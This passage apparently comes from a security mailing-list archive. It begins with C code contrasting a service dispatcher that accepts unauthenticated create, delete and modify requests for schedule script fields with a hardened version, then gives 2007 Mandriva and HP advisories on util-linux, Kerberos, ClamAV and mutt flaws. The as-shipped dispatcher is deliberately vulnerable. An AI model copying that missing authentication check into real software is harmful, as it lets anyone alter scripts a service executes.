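enum result { R_OK, R_UNKNOWN_OP, R_DENIED, R_NOT_FOUND };

/* Hypothetical types: one schedule slot standing in for an entry under the
 * Schedules registry key, and the per-connection state a service would keep. */
struct schedule { bool used; char name[32]; char pre_script[128]; char post_script[128]; };
struct session  { bool authenticated; };
struct request  { uint32_t op; const char *name, *pre_script, *post_script; };

static void copy_field(char *dst, size_t cap, const char *src) {
    snprintf(dst, cap, "%s", src ? src : "");   /* bounded, always NUL-terminated */
}
static enum result do_create(struct schedule *s, const struct request *r) {
    s->used = true;
    copy_field(s->name, sizeof s->name, r->name);
    copy_field(s->pre_script, sizeof s->pre_script, r->pre_script);
    copy_field(s->post_script, sizeof s->post_script, r->post_script);
    return R_OK;
}
static enum result do_delete(struct schedule *s) {
    if (!s->used) return R_NOT_FOUND;
    memset(s, 0, sizeof *s);
    return R_OK;
}
static enum result do_modify(struct schedule *s, const struct request *r) {
    if (!s->used) return R_NOT_FOUND;
    copy_field(s->pre_script, sizeof s->pre_script, r->pre_script);
    copy_field(s->post_script, sizeof s->post_script, r->post_script);
    return R_OK;
}

/* As the advisory describes it: the request code alone selects the handler,
 * and nothing asks who sent the request. */
static enum result dispatch_as_shipped(struct schedule *s, const struct request *r) {
    uint32_t eax = r->op;                     /* mov eax, [ebp-80h] */
    if (--eax == 0) return do_create(s, r);   /* dec eax / jz create_registry */
    if (--eax == 0) return do_delete(s);      /* dec eax / jz delete_registry */
    --eax;                                    /* dec eax */
    if (--eax == 0) return do_modify(s, r);   /* dec eax / jz modify_registry */
    return R_UNKNOWN_OP;
}

/* Hardened form: refuse every request until the connection has authenticated,
 * then dispatch on an explicit list of known request codes. */
static enum result dispatch_hardened(const struct session *c, struct schedule *s,
                                     const struct request *r) {
    if (c == NULL || !c->authenticated) return R_DENIED;
    switch (r->op) {
    case OP_CREATE: return do_create(s, r);
    case OP_DELETE: return do_delete(s);
    case OP_MODIFY: return do_modify(s, r);
    default:        return R_UNKNOWN_OP;
    }
}

int main(void) {
    /* Constructed sample data; the script names are placeholders. */
    struct schedule s = {0};
    struct session anon = { .authenticated = false };
    struct request mk  = { OP_CREATE, "nightly", "quiesce.cmd", "resume.cmd" };
    struct request chg = { OP_MODIFY, "nightly", "quiesce.cmd", "changed.cmd" };
    dispatch_as_shipped(&s, &mk);
    printf("as shipped: result=%d PostScript=%s\n", dispatch_as_shipped(&s, &chg), s.post_script);
    dispatch_as_shipped(&s, &mk);             /* reset the slot */
    printf("hardened:   result=%d PostScript=%s\n", dispatch_hardened(&anon, &s, &chg), s.post_script);
    return 0;
}
```

The same unauthenticated modify request rewrites the PostScript field in the first dispatcher and is refused, with the schedule unchanged, in the second.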



[ MDKSA-2007:111 ] - Updated util-linux packages address login access policies bypassing issue

2007-06-05 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:111
 http://www.mandriva.com/security/
 ___
 
 Package : util-linux
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 login in util-linux-2.12a (and later versions) skips pam_acct_mgmt
 and chauth_tok when authentication is skipped, such as when a
 Kerberos krlogin session has been established, which might allow
 users to bypass intended access policies that would be enforced by
 pam_acct_mgmt and chauth_tok.
 
 Updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7108
 ___
 
 Updated Packages:
 
 ___



[security bulletin] HPSBUX02217 SSRT071337 rev.2 - HP-UX running Kerberos, Remote Arbitrary Code Execution

2007-06-05 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01056923
Version: 2

HPSBUX02217 SSRT071337 rev.2 - HP-UX running Kerberos, Remote Arbitrary Code 
Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-05-15
Last Updated: 2007-05-25

Potential Security Impact: Remote arbitrary code execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified on HP-UX running 
Kerberos. The vulnerability could be exploited by remote authorized users to 
execute arbitrary code.

References: CVE-2007-1216

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running the Kerberos Client software 
versions 1.3.5.05 and previous.

BACKGROUND

To determine if a system has an affected version, search the output of "swlist 
-a revision -l fileset" for an affected fileset. Then determine if the 
recommended patch or update is installed. 

AFFECTED VERSIONS 

HP-UX B.11.11 
= 
krb5client.KRB5-64SLIB-A 
krb5client.KRB5-E-A-MAN-A 
krb5client.KRB5-J-E-MAN-A 
krb5client.KRB5-J-S-MAN-A 
krb5client.KRB5-PRG-A 
krb5client.KRB5-RUN-A 
krb5client.KRB5-SHLIB-A 
action: install revision C.1.3.5.06 or subsequent 

KRB5-Client.KRB5-SHLIB 
KRB5-Client.KRB5-PRG 
KRB5-Client.KRB5-RUN 
KRB5-Client.KRB5-ENG-A-MAN 
KRB5-Client.KRB5-JPN-E-MAN 
KRB5-Client.KRB5-JPN-S-MAN 
KRB5-Client.KRB5-64SLIB 
action: install PHSS_36286 or subsequent 

HP-UX B.11.23 
= 
krb5client.KRB5-64SLIB-A 
krb5client.KRB5-E-A-MAN-A 
krb5client.KRB5-J-E-MAN-A 
krb5client.KRB5-J-S-MAN-A 
krb5client.KRB5-PRG-A 
krb5client.KRB5-RUN-A 
krb5client.KRB5-SHLIB-A 
krb5client.KRB5IA32SLIB-A 
krb5client.KRB5IA64SLIB-A 
action: install revision D.1.3.5.06 or subsequent 

KRB5-Client.KRB5-64SLIB 
KRB5-Client.KRB5-ENG-A-MAN 
KRB5-Client.KRB5-IA32SLIB 
KRB5-Client.KRB5-IA64SLIB 
KRB5-Client.KRB5-JPN-E-MAN 
KRB5-Client.KRB5-JPN-S-MAN 
KRB5-Client.KRB5-PRG 
KRB5-Client.KRB5-RUN 
KRB5-Client.KRB5-SHLIB 
action: install PHSS_34991 or subsequent 

HP-UX B.11.31 
= 
KRB5-Client.KRB5-64SLIB 
KRB5-Client.KRB5-IA32SLIB 
KRB5-Client.KRB5-IA64SLIB 
KRB5-Client.KRB5-SHLIB 
KRB5-Client.KRB5-64SLIB 
KRB5-Client.KRB5-SHLIB 
action: install PHSS_36361 or subsequent 

END AFFECTED VERSIONS 

RESOLUTION

HP has made the following patches and software updates available to resolve the 
vulnerability: 

B.11.11 PHSS_36286 or Kerberos Client C.1.3.5.06 or subsequent 
B.11.23 PHSS_34991 or Kerberos Client D.1.3.5.06 or subsequent 
B.11.31 PHSS_36361 or subsequent 

These software updates are available on: http://www.hp.com/go/softwaredepot/ 
The patches are available on: http://itrc.hp.com 

MANUAL ACTIONS: Yes - Update 

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa 

HISTORY 
Version: 1 (rev.1) - 21 May 2007 Initial release 
Version: 2 (rev.2) - 29 May 2007 Corrected typo in Reference 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 



[ MDKSA-2007:115 ] - Updated clamav packages fix vulnerabilities

2007-06-05 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:115
 http://www.mandriva.com/security/
 ___
 
 Package : clamav
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A vulnerability in the OLE2 parser in ClamAV was found that could
 allow a remote attacker to cause a denial of service via resource
 consumption with a carefully crafted OLE2 file.
 
 Other vulnerabilities and bugs have also been corrected in 0.90.3
 which is being provided with this update.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2650
 ___
 
 Updated Packages:
 

[ MDKSA-2007:113 ] - Updated mutt packages fix vulnerabilities

2007-06-05 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:113
 http://www.mandriva.com/security/
 ___
 
 Package : mutt
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0
 ___
 
 Problem Description:
 
 A flaw in the way mutt processed certain APOP authentication requests
 was discovered.  By sending certain responses when mutt attempted to
 authenticate against an APOP server, a remote attacker could possibly
 obtain certain portions of the user's authentication credentials
 (CVE-2007-1558).
 
 A flaw in how mutt handled certain characters in gecos fields could
 lead to a buffer overflow.  A local user able to give themselves a
 carefully crafted Real Name could potentially execute arbitrary code
 if a victim used mutt to expand the attacker's alias (CVE-2007-2683).
 
 Updated packages have been patched to address these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683
 ___
 
 Updated Packages:
 
 ___


 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  